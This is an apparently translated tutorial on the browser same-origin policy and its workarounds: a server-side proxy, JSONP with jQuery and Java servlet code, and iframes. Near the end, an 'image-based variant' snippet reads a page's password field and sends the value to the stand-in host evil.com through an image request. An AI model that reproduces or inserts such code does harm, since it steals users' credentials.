AJAX Cross-Domain Same-Origin Policy limitation


AJAX Same-Origin Policy (SOP) limitation:
Excerpted from: http://www.ibm.com/developerworks/library/wa-aj-jsonp1/

http://www.ibm.com/developerworks/cn/lotus/mashup-openajax/index.html

In the same-origin policy, an "origin" is the triple of host name, protocol and port number. Under the same-origin policy, the browser only allows scripts in a page (JavaScript or VBScript) to access HTTP requests and cookies that belong to the same origin. Note that even when a domain name and an IP address point to the same host, they are different origins. Also note that the same-origin policy only restricts the page's HTML document object (XMLHttpRequest); static resource files such as JavaScript files, CSS files and images can still be loaded into the HTML document object (for example via <script src="...">, <img src="...">). Static files can therefore be loaded into an HTML document from any other domain.
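To make the triple concrete, here is an added example (not from the original post) that compares two URLs the way the same-origin policy does: protocol, host name and port, with default ports filled in. It assumes Node's built-in URL parser; the URLs and the IP address are constructed placeholders.

```javascript
// Default ports, so "http://example.com" and "http://example.com:80" compare equal.
const DEFAULT_PORT = { "http:": "80", "https:": "443" };

// The (protocol, host name, port) triple that defines an origin.
function originTriple(urlString) {
  const u = new URL(urlString);
  return {
    protocol: u.protocol,
    host: u.hostname,
    port: u.port || DEFAULT_PORT[u.protocol] || "",
  };
}

// Two URLs share an origin only when all three parts match.
function isSameOrigin(a, b) {
  const x = originTriple(a), y = originTriple(b);
  return x.protocol === y.protocol && x.host === y.host && x.port === y.port;
}

// Constructed pairs illustrating the rules above; 203.0.113.10 is a documentation
// address, not a real lookup of example.com.
const PAIRS = [
  ["http://example.com/page.html", "http://example.com:80/api/data"], // same origin
  ["http://example.com/", "https://example.com/"],                     // protocol differs
  ["http://example.com/", "http://example.com:8080/"],                 // port differs
  ["http://example.com/", "http://203.0.113.10/"],                     // name vs IP: different origin
  ["http://example.com/", "http://api.example.com/"],                  // different host name
];

// Returns one boolean per pair: [true, false, false, false, false]
function checkPairs() {
  return PAIRS.map(([a, b]) => isSameOrigin(a, b));
}
```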

AJAX requests across domains are blocked by the same-origin policy; there are several ways to work around this limitation.

1. Write a proxy on the server side. The SOP limitation exists only on the JavaScript side; on the server side we can still call a URL in another domain, for example with HttpClient.

2. JSONP (JSON with Padding)

The same-origin policy does not prevent the insertion of dynamic script elements into the document (dynamically inserted images work the same way, so static resources can also trigger cross-domain requests). That is, you can dynamically insert JavaScript from other domains, carrying JSON data in it.

```javascript
// This is our function to be called with JSON data
function showPrice(data) {
    alert("Symbol: " + data.symbol + ", Price: " + data.price);
}
var url = "ticker.js"; // URL of the external script

// This shows dynamic script insertion
var script = document.createElement('script');
script.setAttribute('src', url);

// Load the script: the browser fetches it, runs it, and the script calls showPrice(...)
document.getElementsByTagName('head')[0].appendChild(script);
```

Note that, in order to do this, you must have a callback function already defined in the Web page at the time of insertion.

Beginning with version 1.2, jQuery has had native support for JSONP calls. You can load JSON data located on another domain if you specify a JSONP callback, which can be done using the following syntax: url?callback=?.

Client-side AJAX call:

```javascript
jQuery.getJSON("http://www.yourdomain.com/jsonp/ticker?symbol=IBM&callback=?",
function(data) {
    alert("Symbol: " + data.symbol + ", Price: " + data.price);
});
```

The other domain generates the JSON data and returns it to the client wrapped in the callback function:

```java
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.*;

public class TickerServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String callback = req.getParameter("callback");
        // The callback name is echoed into a script, so accept only a plain identifier.
        if (callback == null || !callback.matches("[A-Za-z_$][\\w$]*")) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid callback");
            return;
        }
        String jsonData = getDataAsJson(req.getParameter("symbol")); // helper not shown on the page
        String output = callback + "(" + jsonData + ");";
        resp.setContentType("text/javascript");
        PrintWriter out = resp.getWriter();
        out.println(output);
        // prints: jsonp1232617941775({"symbol" : "IBM", "price" : "91.42"});
    }
}
```
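The dynamic script insertion and the jQuery "url?callback=?" call above are two halves of one contract; the following added example (not from the original post or the IBM article) shows both halves in plain JavaScript. tickerEndpoint is a constructed stand-in for the servlet, the host ticker.example is a placeholder, and new Function stands in for the browser running the fetched script.

```javascript
// Server side: wrap JSON in a call to the requested callback. The callback
// name is echoed straight into script, so only a plain identifier is accepted.
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*$/;

function padJsonp(callbackName, data) {
  if (typeof callbackName !== "string" || !CALLBACK_NAME.test(callbackName)) {
    throw new Error("invalid JSONP callback name");
  }
  return callbackName + "(" + JSON.stringify(data) + ");";
}

// Constructed ticker endpoint: reads symbol and callback from the query string.
function tickerEndpoint(url) {
  const u = new URL(url);
  const data = { symbol: u.searchParams.get("symbol"), price: "91.42" };
  return padJsonp(u.searchParams.get("callback"), data);
}

// Client side: register a one-shot callback under a unique global name and
// build the script URL, which is what jQuery does for "url?callback=?".
function jsonpRequest(baseUrl, scope, onData) {
  const name = "jsonp" + Date.now();
  scope[name] = function (data) {
    delete scope[name]; // one-shot, like jQuery's generated callbacks
    onData(data);
  };
  const sep = baseUrl.includes("?") ? "&" : "?";
  return { name, url: baseUrl + sep + "callback=" + encodeURIComponent(name) };
}

// Round trip: the padded script calls the registered callback by name.
function fetchQuote(symbol) {
  const scope = {};
  let received = null;
  const { name, url } = jsonpRequest(
    "http://ticker.example/jsonp/ticker?symbol=" + encodeURIComponent(symbol),
    scope, function (d) { received = d; });
  const script = tickerEndpoint(url);
  new Function(name, script)(scope[name]); // stands in for the <script> load
  return received;
}
```

A callback name that is not an identifier is rejected by padJsonp before anything is echoed, which is the check the servlet above needs as well.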

The image-based variant looks like this:

```javascript
(function () {
    function getPassword() {
        var pw = document.getElementById("password").value;
        var imgTag = document.createElement("IMG");
        // Setting src triggers the request; image loads are not restricted by the
        // same-origin policy, so the query string reaches the other domain.
        imgTag.setAttribute("src", "http://evil.com?pw=" + pw);
    }
    document.getElementById("submit").addEventListener("click", getPassword);
})();
```

3. iframe

The src of an iframe can point to any server URL.
